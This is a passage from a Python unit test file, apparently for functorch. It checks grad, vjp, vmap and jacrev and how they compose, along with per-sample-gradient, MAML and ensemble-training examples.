torch.flatten(x).sum())(x)\n self.assertEqual(result, torch.ones_like(x))\n\n def test_fn_with_kwargs(self, device):\n def foo(x, y):\n return (x * y).sum()\n\n x = torch.randn(3, device=device)\n y = torch.randn(3, device=device)\n expected = grad(foo)(x, y)\n result = grad(foo)(x, y=y)\n self.assertEqual(result, expected)\n\n def test_composite_complicated(self, device):\n x = torch.randn(3, device=device)\n y = torch.randn(3, 5, device=device)\n\n def foo(x, y):\n result = x @ y\n return result.sum()\n\n result = grad(foo)(x, y)\n\n x.requires_grad_()\n out = foo(x, y)\n expected, = torch.autograd.grad(out, x)\n\n self.assertEqual(result, expected)\n\n def test_composite_two_ops(self, device):\n N, C = 2, 5\n y = torch.randn(N, C, device=device)\n targets = torch.randint(0, C, (N,), device=device)\n\n def foo(y, targets):\n return F.cross_entropy(y, targets)\n\n result = grad(foo)(y, targets)\n\n y.requires_grad_()\n expected, = torch.autograd.grad(foo(y, targets), y)\n\n self.assertEqual(result, expected)\n\n def _test_attributes(self, get_attr_lambda, device):\n x = torch.randn(2, 3, 5, dtype=torch.double, device=device)\n expected = get_attr_lambda(x)\n\n def foo(x):\n self.assertEqual(get_attr_lambda(x), expected)\n return x.sum()\n\n grad(foo)(x)\n\n def test_shape(self, device):\n self._test_attributes(lambda x: x.shape, device)\n\n def test_dtype(self, device):\n self._test_attributes(lambda x: x.dtype, device)\n\n def test_is_cuda(self, device):\n self._test_attributes(lambda x: x.is_cuda, device)\n\n def test_numel(self, device):\n self._test_attributes(lambda x: x.numel(), device)\n\n def test_inplace(self, device):\n x = torch.randn([], device=device)\n\n def foo(x):\n return x.clone().sin_()\n\n result = grad(foo)(x)\n self.assertEqual(result, x.cos())\n\n def test_inplace_on_view(self, device):\n x = torch.randn(3, device=device)\n\n def foo(x):\n y = x.clone()\n y0 = y[0]\n y0.sin_()\n return y.sum()\n\n result = grad(foo)(x)\n\n x.requires_grad_()\n out = foo(x)\n expected, = torch.autograd.grad(out, x)\n\n self.assertEqual(result, expected)\n\n def 
test_inplace_on_view_base(self, device):\n x = torch.randn(3, device=device)\n\n def foo(x):\n y = x.clone()\n y0 = y[0]\n y.sin_()\n return y0\n\n result = grad(foo)(x)\n\n x.requires_grad_()\n out = foo(x)\n expected, = torch.autograd.grad(out, x)\n\n self.assertEqual(result, expected)\n\n def test_nesting_simple(self, device):\n x = torch.randn([], device=device)\n result = grad(grad(torch.sin))(x)\n self.assertEqual(result, -torch.sin(x))\n\n def test_escaped_wrappers_are_marked_as_dead(self, device):\n x = torch.randn([], device=device)\n escaped = []\n def foo(x):\n y = x.sin()\n escaped.append(y)\n return y\n\n result = grad(foo)(x)\n self.assertEqual(functorch._C.dlevel(escaped[0]), -1)\n\n def test_escaped_wrappers_are_ignored(self, device):\n x = torch.randn([], device=device)\n escaped = []\n def foo(x):\n y = x.sin()\n escaped.append(y)\n return y\n\n result = grad(foo)(x)\n\n something = escaped[0].sum()\n self.assertEqual(functorch._C.dlevel(something), 0)\n self.assertEqual(something, x.sin().sum())\n\n def test_vjp(self, device):\n x = torch.randn([], device=device)\n out, vjp_fn = vjp(torch.sin, x)\n self.assertEqual(out, x.sin())\n\n v = torch.randn([], device=device)\n result, = vjp_fn(v)\n self.assertEqual(result, v * x.cos())\n\n def test_vjp_two_outputs(self, device):\n def f(x):\n return x, x\n result, vjp_fn = vjp(f, torch.tensor(1.))\n vjp_fn(result)\n\n def test_composed_with_autograd(self, device):\n x = torch.randn([], requires_grad=True, device=device)\n\n y = grad(torch.sin)(x)\n result, = torch.autograd.grad(y, x)\n self.assertEqual(result, -x.sin())\n\n def test_grad_of_vjp_composition(self, device):\n x = torch.randn([], device=device)\n y = torch.randn([], device=device)\n\n def foo(x, y):\n out, vjp_fn = vjp(torch.sin, x)\n return grad(lambda y: vjp_fn(y)[0])(y)\n\n result = foo(x, y)\n expected = x.cos()\n self.assertEqual(result, expected)\n\n def test_vjp_of_grad_composition(self, device):\n x = torch.randn([], device=device)\n y = torch.randn([], device=device)\n\n def foo(x, y):\n out, vjp_fn = vjp(grad(torch.sin), x)\n return vjp_fn(y)[0]\n\n result = foo(x, y)\n expected = -y * x.sin()\n self.assertEqual(result, expected)\n\n def test_grad_of_vjp_of_grad_composition(self, device):\n x = torch.randn([], device=device)\n y = torch.randn([], device=device)\n\n def foo(x, y):\n df, vjp_fn = vjp(grad(lambda x: -torch.cos(x)), x)\n return grad(lambda y: vjp_fn(y)[0])(y)\n\n result = foo(x, y)\n expected = x.cos()\n self.assertEqual(result, expected)\n\n def test_views(self, device):\n x = torch.randn([], requires_grad=True, device=device)\n y = torch.randn([], requires_grad=True, device=device)\n\n def silly_sin(x):\n x = x.view([])\n x = x.sin()\n return x\n\n def foo(x, y):\n z1 = grad(silly_sin)(x)\n z2 = torch.cos(y)\n return z1 + z2\n\n result = foo(x, y)\n grads = torch.autograd.grad(result, [x, y])\n self.assertEqual(grads[0], -x.sin())\n self.assertEqual(grads[1], -y.sin())\n\n def test_view_inplace_simple(self, device):\n def foo(x):\n x = x.clone()\n x.view([]).sin_()\n return x\n\n x = torch.randn([], requires_grad=True, device=device)\n result = grad(foo)(x)\n self.assertEqual(result, x.cos())\n\n def test_invalid_argnums(self, device):\n x = torch.randn([])\n y = torch.randn([])\n with self.assertRaisesRegex(RuntimeError, 'but only'):\n grad(torch.mul, argnums=-1)(x, y)\n with self.assertRaisesRegex(RuntimeError, 'but only'):\n grad(torch.mul, argnums=2)(x, y)\n with self.assertRaisesRegex(RuntimeError, 'int or Tuple'):\n grad(torch.mul, 
argnums=[0])(x, y)\n with self.assertRaisesRegex(RuntimeError, 'must be int'):\n grad(torch.mul, argnums=('0',))(x, y)\n\n def test_argnums(self, device):\n x = torch.randn([])\n y = torch.randn([])\n gx = grad(torch.mul, argnums=0)(x, y)\n self.assertEqual(gx, y)\n\n gy = grad(torch.mul, argnums=1)(x, y)\n self.assertEqual(gy, x)\n\n gx, = grad(torch.mul, argnums=(0,))(x, y)\n self.assertEqual(gx, y)\n\n gx, gy = grad(torch.mul, argnums=(0, 1))(x, y)\n self.assertEqual(gx, y)\n self.assertEqual(gy, x)\n\n def test_zero_grad(self, device):\n def f(x):\n return (x['a']**2.0).sum()\n inps = ({'a':torch.randn(10, device=device) + 3, 'b':torch.randn(10, device=device)})\n grads = grad(f)(inps)\n self.assertNotEqual(grads['a'].sum(), 0.0)\n self.assertEqual(grads['b'].sum(), 0.0)\n\n def test_unrelated_grad(self, device):\n x = torch.tensor(1., device=device)\n y = torch.tensor(2., device=device)\n\n def unrelated(x):\n return y\n\n result = grad(unrelated)(x)\n self.assertEqual(result, torch.zeros_like(x))\n\n def test_unrelated_vjp(self, device):\n x = torch.tensor(1., device=device)\n y = torch.tensor(2., device=device)\n v = torch.tensor(1., device=device)\n\n def unrelated(x):\n return y\n\n out, vjp_fn = vjp(unrelated, x)\n result = vjp_fn(v)\n expected = (torch.zeros_like(x),)\n self.assertEqual(result, expected)\n\n def test_unrelated_vjp_multiple_inputs_outputs(self, device):\n w = torch.tensor(3., device=device)\n x = torch.tensor(4., device=device)\n y = torch.tensor(2., device=device)\n v = torch.tensor(1., device=device)\n\n def unrelated(w, x):\n return y, y, x\n\n out, vjp_fn = vjp(unrelated, w, x)\n result = vjp_fn((v, v, v))\n expected = (torch.zeros_like(x), torch.ones_like(x))\n self.assertEqual(result, expected)\n\n # TODO: https://github.com/zou3519/functorch/issues/12\n @onlyCPU\n def test_unrelated_hessian(self, device):\n N = 5\n M = 3\n W = torch.randn(N, M, device=device)\n\n def f(x):\n return W @ x\n\n x = torch.randn(M)\n result = jacrev(jacrev(f))(x)\n expected = torch.zeros(N, M, M, device=device)\n self.assertEqual(result, expected)\n\n def test_vjp_pytree_input(self, device):\n def f(x):\n return x[0] * x[1][0]\n\n x = torch.randn([], device=device)\n v = torch.randn([], device=device)\n out, vjp_fn = vjp(f, (x, (x, x)))\n self.assertEqual(out, x * x)\n result = vjp_fn(v)\n self.assertEqual(result, ((x * v, (x * v, 0.)),))\n\n def test_vjp_pytree_output(self, device):\n def f(x):\n return x, (x, x)\n\n x = torch.randn([], device=device)\n v1 = torch.randn([], device=device)\n v2 = torch.randn([], device=device)\n v3 = torch.randn([], device=device)\n _, vjp_fn = vjp(f, x)\n result, = vjp_fn((v1, (v2, v3)))\n self.assertEqual(result, v1 + v2 + v3)\n\n def test_vjp_pytree_error(self, device):\n def f(x):\n return x, (x, x)\n\n x = torch.randn([], device=device)\n v1 = torch.randn([], device=device)\n v2 = torch.randn([], device=device)\n v3 = torch.randn([], device=device)\n _, vjp_fn = vjp(f, x)\n with self.assertRaisesRegex(RuntimeError, 'Expected pytree structure'):\n result, = vjp_fn(((v1, (v2, v3)),))\n\n def test_functional_init(self, device):\n class MLPClassifier(nn.Module):\n def __init__(self, hidden_dim=32, n_classes=2):\n super().__init__()\n self.hidden_dim = hidden_dim\n self.n_classes = n_classes\n\n self.fc1 = nn.Linear(2, self.hidden_dim)\n self.fc2 = nn.Linear(self.hidden_dim, self.n_classes)\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n x = F.log_softmax(x, -1)\n return x\n\n B = 10\n weights, fn, _ = 
functional_init(MLPClassifier, (B,))(32, 2)\n inputs = torch.randn(B, 7, 2)\n vmap(fn)(weights, (inputs,))\n\n def test_functional_init_with_buffers(self, device):\n class MLPClassifier(nn.Module):\n def __init__(self, hidden_dim=32, n_classes=2):\n super().__init__()\n self.hidden_dim = hidden_dim\n self.n_classes = n_classes\n\n self.fc1 = nn.Linear(2, self.hidden_dim)\n self.bn = nn.BatchNorm1d(self.hidden_dim, affine=True)\n self.fc2 = nn.Linear(self.hidden_dim, self.n_classes)\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(x)\n x = self.bn(x)\n x = self.fc2(x)\n x = F.log_softmax(x, -1)\n return x\n\n B = 10\n weights, buffers, fn, _, _ = \\\n functional_init_with_buffers(MLPClassifier, [B])(32, 2)\n inputs = torch.randn(B, 7, 2)\n vmap(fn)(weights, buffers, (inputs,))\n\n def test_advanced_indexing(self, device):\n def f(value):\n log_prob = torch.ones((), device=device)\n val = (torch.zeros(()) > 0)\n log_prob[val] = 0\n return value\n\n result = grad(f)(torch.randn((), device=device))\n self.assertEqual(result, torch.ones_like(result))\n\n def f2(value):\n value = value.clone()\n value[value > 0] = 0\n return value.sum()\n\n x = torch.randn(100, device=device)\n result = grad(f2)(x)\n self.assertEqual(result, (x <= 0).type_as(x))\n\n def test_tensor_ctor_inside_grad(self, device):\n def foo(x):\n return x * torch.tensor(2., device=device)\n\n x = torch.tensor(3.14, device=device)\n functorch.grad(foo)(x)\n\n @onlyCPU\n def test_tensor_print(self, device):\n x = torch.tensor(3.14, device=device)\n buf = None\n\n def foo(x):\n nonlocal buf\n buf = repr(x)\n return x\n\n grad(grad(foo))(x)\n expected = textwrap.dedent(\"\"\"\\\n GradTrackingTensor(lvl=3, value=\\\\\n GradTrackingTensor(lvl=2, value=\\\\\n tensor(3.1400)))\"\"\")\n self.assertEqual(buf, expected)\n\n\nclass TestVmapOfGrad(TestCase):\n def test_per_sample_grads_inplace_view(self, device):\n def compute_loss(weight, x, t):\n x = x.mm(weight)\n y = x.squeeze_(0)\n return (y - t).sum()\n\n weight = torch.randn(16, 2, device=device)\n x = torch.randn(64, 1, 16, device=device)\n t = torch.randn(64, 2, device=device)\n result = vmap(partial(grad(compute_loss), weight))(x, t)\n expected = [grad(compute_loss)(weight, x[i], t[i]) for i in range(64)]\n expected = torch.stack(expected)\n # TODO: Check if the rtol is a problem\n self.assertEqual(result, expected, atol=0, rtol=5e-4)\n\n def test_new_zeros_materializes_tensor(self, device):\n N = 3\n C = 5\n\n def foo(y, x):\n result = x.new_zeros((C,))\n result.copy_(y)\n return result.sum()\n\n x = torch.randn(N, device=device)\n y = torch.randn(N, C, device=device)\n result = vmap(grad(foo))(y, x)\n self.assertEqual(result, torch.ones_like(y))\n\n def test_new_empty_materializes_tensor(self, device):\n N = 3\n C = 5\n\n def foo(y, x):\n result = x.new_empty((C,))\n result.copy_(y)\n return result.sum()\n\n x = torch.randn(N, device=device)\n y = torch.randn(N, C, device=device)\n result = vmap(grad(foo))(y, x)\n self.assertEqual(result, torch.ones_like(y))\n\n def test_per_sample_grads_simple(self, device):\n def compute_loss(weight, x, t):\n y = x @ weight\n return ((y - t) ** 2).sum()\n\n weight = torch.randn(16, 2, device=device)\n x = torch.randn(64, 16, device=device)\n t = torch.randn(64, 2, device=device)\n result = vmap(partial(grad(compute_loss), weight))(x, t)\n expected = [grad(compute_loss)(weight, x[i], t[i]) for i in range(64)]\n expected = torch.stack(expected)\n # TODO: Check if the rtol is a problem\n self.assertEqual(result, expected, atol=0, 
rtol=5e-4)\n\n def test_per_sample_grads_embeddingnet(self, device):\n class SampleNet(nn.Module):\n def __init__(self, vocab_size: int):\n super().__init__()\n self.emb = nn.Embedding(vocab_size, 16)\n self.fc1 = nn.Linear(16, 16)\n self.fc2 = nn.Linear(16, 2)\n\n def forward(self, x):\n x = self.emb(x)\n x = torch.transpose(x, -1, -2)\n x = torch.mean(x, -1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n return x\n\n def name(self):\n return \"SampleNet\"\n\n # Create our inputs...\n vocab_size = 1000\n batch_shape = [64]\n words_per_sentence = 5\n data = torch.randint(0, vocab_size, (*batch_shape, words_per_sentence), device=device)\n targets = torch.randint(0, 1, (*batch_shape,), device=device)\n\n # Construct our module\n net = SampleNet(vocab_size).to(device=device)\n criterion = nn.CrossEntropyLoss()\n\n net_func, weights = make_functional(net)\n\n def compute_loss(weights, data, target):\n output = net_func(weights, data)\n result = criterion(output, target)\n return result\n\n expected = [grad(compute_loss)(weights, data[i], targets[i]) for i in range(64)]\n expected = zip(*expected)\n expected = tuple(torch.stack(shards) for shards in expected)\n\n result = vmap(partial(grad(compute_loss), weights))(data, targets)\n for r, e in zip(result, expected):\n # TODO: Check if the rtol is a problem\n self.assertEqual(r, e, atol=0, rtol=1e-4)\n\n def test_log_softmax(self, device):\n x = torch.randn(3, 5)\n v = torch.randn(5)\n\n def foo(x, v):\n _, vjp_fn = vjp(partial(torch.log_softmax, dim=-1), x)\n return vjp_fn(v)[0]\n\n result = vmap(foo, (0, None))(x, v)\n\n v = v.expand_as(x)\n x.requires_grad_()\n output = torch.log_softmax(x, dim=-1)\n output.backward(v)\n self.assertEqual(result, x.grad)\n\n\nclass TestJacrev(TestCase):\n def test_simple(self, device):\n x = torch.randn(3, device=device)\n y = jacrev(torch.sin)(x)\n expected = torch.diagflat(x.cos())\n assert torch.allclose(y, expected)\n\n def test_simple_not_flat(self, device):\n x = torch.randn(2, 3, device=device)\n y = jacrev(torch.sin)(x)\n expected = torch.diagflat(x.view(-1).cos())\n expected = expected.view(2, 3, 2, 3)\n assert torch.allclose(y, expected)\n\n def test_vmap_on_jacrev_simple(self, device):\n x = torch.randn(2, 3, device=device)\n y = vmap(jacrev(torch.sin))(x)\n expected = torch.stack([torch.diagflat(x[i].cos()) for i in range(2)])\n assert torch.allclose(y, expected)\n\n def test_hessian_simple(self, device):\n def foo(x):\n return x.sin().sum()\n\n x = torch.randn(3, device=device)\n y = jacrev(jacrev(foo))(x)\n expected = torch.diagflat(-x.sin())\n assert torch.allclose(y, expected)\n\n def test_multiple_args(self, device):\n x = torch.randn(3, device=device)\n y = torch.randn(3, device=device)\n z = jacrev(torch.multiply, argnums=1)(x, y)\n expected = torch.diagflat(x)\n assert torch.allclose(z, expected)\n\n def test_argnums_tuple(self, device):\n x = torch.randn(3, device=device)\n y = torch.randn(3, device=device)\n z = jacrev(torch.multiply, argnums=(0, 1))(x, y)\n expected0 = torch.diagflat(y)\n expected1 = torch.diagflat(x)\n assert len(z) == 2\n assert torch.allclose(z[0], expected0)\n assert torch.allclose(z[1], expected1)\n \n def test_empty_argnums(self, device):\n x = torch.randn(3, device=device)\n with self.assertRaisesRegex(RuntimeError, \"must be non-empty\"):\n z = jacrev(torch.sin, argnums=())(x)\n\n def test_out_of_bounds_argnums(self, device):\n x = torch.randn(3, device=device)\n with self.assertRaisesRegex(RuntimeError, \"only 1 positional inputs\"):\n z = 
jacrev(torch.sin, argnums=2)(x)\n\n def test_negative_argnums(self, device):\n x = torch.randn(3, device=device)\n with self.assertRaisesRegex(RuntimeError, \"only 1 positional inputs\"):\n z = jacrev(torch.sin, argnums=-1)(x)\n\n def test_repeated_argnums(self, device):\n x = torch.randn(3, device=device)\n with self.assertRaisesRegex(RuntimeError, \"must be unique\"):\n z = jacrev(torch.sin, argnums=(0,0))(x)\n\n\nclass TestComposability(TestCase):\n def test_grad_grad(self, device):\n x = torch.randn([], device=device)\n y = grad(grad(torch.sin))(x)\n self.assertEqual(y, -x.sin())\n\n def test_grad_vmap(self, device):\n def foo(x):\n y = vmap(torch.sin)(x)\n return y.sum()\n\n x = torch.randn(3)\n y = grad(foo)(x)\n self.assertEqual(y, x.cos())\n\n def test_grad_vjp(self, device):\n x = torch.randn(3, device=device)\n\n def foo(x):\n _, vjp_fn = vjp(torch.sin, x)\n return vjp_fn(x)[0].sum()\n\n y = grad(foo)(x)\n expected = grad(lambda x: (x * x.cos()).sum())(x)\n self.assertEqual(y, expected)\n\n def test_vmap_grad(self, device):\n x = torch.randn(3, device=device)\n y = vmap(grad(torch.sin))(x)\n self.assertEqual(y, x.cos())\n\n def test_vmap_vmap(self, device):\n x = torch.randn(2, 3, device=device)\n y = vmap(vmap(torch.sin))(x)\n self.assertEqual(y, x.sin())\n\n def test_vmap_vjp(self, device):\n x = torch.randn(3, device=device)\n _, vjp_fn = vjp(torch.sin, x)\n\n def foo(x):\n _, vjp_fn = vjp(torch.sin, x)\n return vjp_fn(x)\n\n y = vmap(foo)(x)\n self.assertEqual(y, vjp_fn(x))\n\n # TODO: there's a very interesting error message when the following\n # is on CPU\n xs = torch.randn(5, 3, device=device)\n expected = torch.stack([vjp_fn(x)[0] for x in xs])\n result = vmap(lambda x: vjp_fn(x)[0])(xs)\n self.assertEqual(result, expected)\n\n def test_vjp_grad(self, device):\n x = torch.randn([], device=device)\n y, vjp_fn = vjp(grad(torch.sin), x)\n self.assertEqual(y, x.cos())\n\n v = torch.randn([])\n self.assertEqual(vjp_fn(v)[0], -x.sin() * v)\n\n def test_vjp_vmap(self, device):\n x = torch.randn(3, device=device)\n y, vjp_fn = vjp(vmap(torch.sin), x)\n self.assertEqual(y, x.sin())\n\n v = torch.randn(3, device=device)\n self.assertEqual(vjp_fn(v)[0], x.cos() * v)\n\n def test_vjp_vjp(self, device):\n x = torch.randn(3, device=device)\n y, vjp_fn = vjp(torch.sin, x)\n self.assertEqual(y, x.sin())\n\n y, vjp_fn = vjp(lambda x: vjp_fn(x)[0], x)\n self.assertEqual(y, x * x.cos())\n\n y = vjp_fn(x)[0]\n # Honestly IDK what the result here is... 
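# (These composability checks all rely on transforms nesting freely; the
# canonical payoff is per-sample gradients, as in TestVmapOfGrad above and
# the resnet18 test below:
#
#     per_sample_grads = vmap(grad(compute_loss), in_dims=(None, 0, 0))(weights, images, targets)
#
# which maps grad over the batched data while sharing the weights.)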
but at least it runs\n\n\nclass TestExamplesCorrectness(TestCase):\n def test_maml_regression(self, device):\n class ThreeLayerNet(nn.Module):\n def __init__(self):\n super(ThreeLayerNet, self).__init__()\n self.fc1 = nn.Linear(1, 40)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Linear(40, 40)\n self.relu2 = nn.ReLU()\n self.fc3 = nn.Linear(40, 1)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.relu1(x)\n x = self.fc2(x)\n x = self.relu2(x)\n x = self.fc3(x)\n return x\n\n # The prototype doesn't like F.mse_loss.\n def mse_loss(x, y):\n return torch.mean((x - y) ** 2)\n\n net, params = make_functional(ThreeLayerNet().to(device))\n K = 20\n losses = []\n num_tasks = 4\n alpha = 0.1\n\n def sample_tasks(outer_batch_size, inner_batch_size):\n # Select amplitude and phase for the task\n As = []\n phases = []\n for _ in range(outer_batch_size):\n As.append(np.random.uniform(low=0.1, high=.5))\n phases.append(np.random.uniform(low=0., high=np.pi))\n def get_batch():\n xs, ys = [], []\n for A, phase in zip(As, phases):\n x = np.random.uniform(low=-5., high=5., size=(inner_batch_size, 1))\n y = A * np.sin(x + phase)\n xs.append(x)\n ys.append(y)\n return torch.tensor(xs, dtype=torch.float, device=device), \\\n torch.tensor(ys, dtype=torch.float, device=device)\n x1, y1 = get_batch()\n x2, y2 = get_batch()\n return x1, y1, x2, y2\n\n def get_loss_for_task(use_transform, x1, y1, x2, y2):\n def inner_loss(params, x1, y1):\n f = net(params, x1)\n loss = mse_loss(f, y1)\n return loss\n\n if use_transform:\n grads = grad(inner_loss)(params, x1, y1)\n else:\n loss = inner_loss(params, x1, y1)\n grads = torch.autograd.grad(loss, params, create_graph=True)\n new_params = [(params[i] - alpha*grads[i]) for i in range(len(params))]\n\n v_f = net(new_params, x2)\n return mse_loss(v_f, y2)\n\n task = sample_tasks(num_tasks, K)\n\n # Compute with vmap+grad\n inner_losses = vmap(partial(get_loss_for_task, True))\\\n (task[0], task[1], task[2], task[3])\n loss2 = sum(inner_losses)/len(inner_losses)\n result_grads = torch.autograd.grad(loss2, params)\n\n # Compute without vmap+grad\n inner_losses = [\n get_loss_for_task(False, task[0][i], task[1][i], task[2][i], task[3][i])\n for i in range(num_tasks)\n ]\n loss2 = sum(inner_losses)/len(inner_losses)\n expected_grads = torch.autograd.grad(loss2, params)\n\n self.assertEqual(result_grads, expected_grads)\n\n def test_maml_omniglot(self, device):\n # TODO: there appears to be precision issues for float32\n dtype = torch.double\n\n # TODO: The prototype doesn't support in-place relu (and some other\n # in-place operations. 
That can be fixed.)\n inplace_relu = False\n n_way = 5\n n_inner_iter = 2\n num_tasks = 2\n class Flatten(nn.Module):\n def forward(self, input):\n return input.view(input.size(0), -1)\n\n net = nn.Sequential(\n nn.Conv2d(1, 64, 3),\n nn.BatchNorm2d(64, momentum=1, affine=True),\n nn.ReLU(inplace=inplace_relu),\n nn.MaxPool2d(2, 2),\n nn.Conv2d(64, 64, 3),\n nn.BatchNorm2d(64, momentum=1, affine=True),\n nn.ReLU(inplace=inplace_relu),\n nn.MaxPool2d(2, 2),\n nn.Conv2d(64, 64, 3),\n nn.BatchNorm2d(64, momentum=1, affine=True),\n nn.ReLU(inplace=inplace_relu),\n nn.MaxPool2d(2, 2),\n Flatten(),\n nn.Linear(64, n_way)).to(device).to(dtype)\n\n fnet, params, buffers = make_functional_with_buffers(net)\n net = (params, buffers, fnet)\n\n def loss_for_task(net, n_inner_iter, use_transform, x_spt, y_spt, x_qry, y_qry):\n params, buffers, fnet = net\n querysz = x_qry.size(0)\n\n def compute_loss(new_params, buffers, x, y):\n logits = fnet(new_params, buffers, x)\n loss = F.cross_entropy(logits, y)\n return loss\n\n new_params = params\n for _ in range(n_inner_iter):\n if use_transform:\n grads = grad(compute_loss)(new_params, buffers, x_spt, y_spt)\n else:\n res = compute_loss(new_params, buffers, x_spt, y_spt)\n grads = torch.autograd.grad(res, new_params, create_graph=True)\n new_params = [p - g * 1e-1 for p, g, in zip(new_params, grads)]\n\n qry_logits = fnet(new_params, buffers, x_qry)\n qry_loss = F.cross_entropy(qry_logits, y_qry)\n qry_acc = (qry_logits.argmax(\n dim=1) == y_qry).sum() / querysz\n\n return qry_loss, qry_acc\n\n # Get some sample inputs...\n x_spt = torch.randn(num_tasks, 25, 1, 28, 28, dtype=dtype, device=device)\n y_spt = torch.randint(0, 5, (num_tasks, 25), device=device)\n x_qry = torch.randn(num_tasks, 75, 1, 28, 28, dtype=dtype,device=device)\n y_qry = torch.randint(0, 5, (num_tasks, 75), device=device)\n\n # compute with vmap + grad\n compute_loss = partial(loss_for_task, net, n_inner_iter, True)\n qry_losses, _ = vmap(compute_loss)(x_spt, y_spt, x_qry, y_qry)\n result_grads = torch.autograd.grad(qry_losses.sum(), params)\n\n # compute without vmap + grad\n compute_loss = partial(loss_for_task, net, n_inner_iter, False)\n losses = [compute_loss(x_spt[i], y_spt[i], x_qry[i], y_qry[i])[0]\n for i in range(num_tasks)]\n expected_grads = torch.autograd.grad(sum(losses), params)\n\n self.assertEqual(result_grads, expected_grads)\n\n def test_lennard_jones_batched_jacrev(self, device):\n sigma = 0.5\n epsilon = 4.\n\n def lennard_jones(r):\n return epsilon * ((sigma / r)**12 - (sigma / r)**6)\n\n def lennard_jones_force(r):\n \"\"\"Get magnitude of LJ force\"\"\"\n return \\\n -epsilon * ((-12 * sigma**12 / r**13) + (6 * sigma**6 / r**7))\n\n r = torch.linspace(0.5, 2 * sigma, requires_grad=True)\n drs = torch.outer(r, torch.tensor([1.0, 0, 0]))\n norms = torch.norm(drs, dim=1).reshape(-1, 1)\n training_energies = \\\n torch.stack(list(map(lennard_jones, norms))).reshape(-1, 1)\n training_forces = torch.stack(\n [force * dr\n for force, dr in zip(map(lennard_jones_force, norms), drs)])\n\n model = nn.Sequential(\n nn.Linear(1, 16),\n nn.Tanh(),\n nn.Linear(16, 16),\n nn.Tanh(),\n nn.Linear(16, 16),\n nn.Tanh(),\n nn.Linear(16, 16),\n nn.Tanh(),\n nn.Linear(16, 1)\n )\n\n def make_prediction(model, drs, use_functorch):\n norms = torch.norm(drs, dim=1).reshape(-1, 1)\n energies = model(norms)\n\n if use_functorch:\n network_derivs = vmap(jacrev(model))(norms).squeeze(-1)\n forces = -network_derivs * drs / norms\n else:\n forces = []\n for r, dr in zip(norms, drs):\n 
network_deriv = torch.autograd.functional.jacobian(\n model, r, create_graph=True)\n force = -network_deriv * dr / r\n forces.append(force)\n forces = torch.cat(forces)\n return energies, forces\n\n def loss_fn(energies, forces, predicted_energies, predicted_forces):\n return F.mse_loss(energies, predicted_energies) + \\\n 0.01 * F.mse_loss(forces, predicted_forces) / 3\n\n energies, forces = make_prediction(model, drs, use_functorch=True)\n loss = loss_fn(training_energies, training_forces, energies, forces)\n result = torch.autograd.grad(loss, model.parameters())\n\n energies, forces = make_prediction(model, drs, use_functorch=False)\n loss = loss_fn(training_energies, training_forces, energies, forces)\n expected = torch.autograd.grad(loss, model.parameters())\n\n self.assertEqual(result, expected)\n\n def test_ensemble_regression(self, device):\n def make_spirals(n_samples, noise_std=0., rotations=1.):\n ts = torch.linspace(0, 1, n_samples)\n rs = ts ** 0.5\n thetas = rs * rotations * 2 * math.pi\n signs = torch.randint(0, 2, (n_samples,)) * 2 - 1\n labels = (signs > 0).to(torch.long)\n\n xs = rs * signs * torch.cos(thetas) + torch.randn(n_samples) * noise_std\n ys = rs * signs * torch.sin(thetas) + torch.randn(n_samples) * noise_std\n points = torch.stack([xs, ys], dim=1)\n return points.to(device), labels.to(device)\n\n points, labels = make_spirals(100, noise_std=0.05)\n\n class MLPClassifier(nn.Module):\n def __init__(self, hidden_dim=32, n_classes=2):\n super().__init__()\n self.hidden_dim = hidden_dim\n self.n_classes = n_classes\n\n self.fc1 = nn.Linear(2, self.hidden_dim)\n self.fc2 = nn.Linear(self.hidden_dim, self.n_classes)\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n x = F.log_softmax(x, -1)\n return x\n\n loss_fn = nn.NLLLoss()\n\n func_model, weights = make_functional(MLPClassifier().to(device))\n\n def train_step_fn(use_transform, weights, batch, targets, lr=0.2):\n def compute_loss(weights, batch, targets):\n output = func_model(weights, batch)\n loss = loss_fn(output, targets)\n return loss\n\n if use_transform:\n grad_weights, loss = grad_and_value(compute_loss)(weights, batch, targets)\n else:\n loss = compute_loss(weights, batch, targets)\n grad_weights = torch.autograd.grad(loss, weights)\n\n new_weights = []\n with torch.no_grad():\n for grad_weight, weight in zip(grad_weights, weights):\n new_weights.append(weight - grad_weight * lr)\n # NB: return looks weird because torch.vmap must return Tensors\n return (loss, *new_weights)\n\n def unpack(train_result):\n return train_result[0], train_result[1:]\n\n def init_fn(num_models):\n models = tuple(MLPClassifier().to(device) for _ in range(num_models))\n weights = tuple(make_functional(model)[1] for model in models)\n weights = tuple(zip(*weights))\n weights = tuple(torch.stack(shards).detach() for shards in weights)\n return weights\n\n def slice_weights(batched_weights, index):\n return tuple(weight[index].detach().requires_grad_() for weight in batched_weights)\n\n batched_weights = init_fn(num_models=2)\n parallel_train_step_fn = vmap(partial(train_step_fn, True), in_dims=(0, None, None))\n\n result_loss, result_weights = unpack(parallel_train_step_fn(batched_weights, points, labels))\n\n loss0, weights0 = unpack(train_step_fn(False, slice_weights(batched_weights, 0), points, labels))\n loss1, weights1 = unpack(train_step_fn(False, slice_weights(batched_weights, 1), points, labels))\n expected_loss = torch.stack([loss0, loss1])\n expected_weights = tuple(torch.stack([w0, w1]) 
for w0, w1 in zip(weights0, weights1))\n\n self.assertEqual(result_loss, expected_loss)\n self.assertEqual(result_weights, expected_weights)\n\n @unittest.skipIf(not USE_TORCHVISION, \"test requires torchvision\")\n def test_resnet18_per_sample_grads(self, device):\n # Straight out of opacus\n def _replace_child(\n root: nn.Module, child_name: str, converter: Callable[[nn.Module], nn.Module]\n ) -> None:\n # find the immediate parent\n parent = root\n nameList = child_name.split(\".\")\n for name in nameList[:-1]:\n parent = parent._modules[name]\n # set to identity\n parent._modules[nameList[-1]] = converter(parent._modules[nameList[-1]])\n\n def replace_all_modules(\n root: nn.Module,\n target_class: Type[nn.Module],\n converter: Callable[[nn.Module], nn.Module],\n ) -> nn.Module:\n # base case\n if isinstance(root, target_class):\n return converter(root)\n\n for name, obj in root.named_modules():\n if isinstance(obj, target_class):\n _replace_child(root, name, converter)\n return root\n\n def _batchnorm_to_groupnorm(module: nn.modules.batchnorm._BatchNorm) -> nn.Module:\n return nn.GroupNorm(min(32, 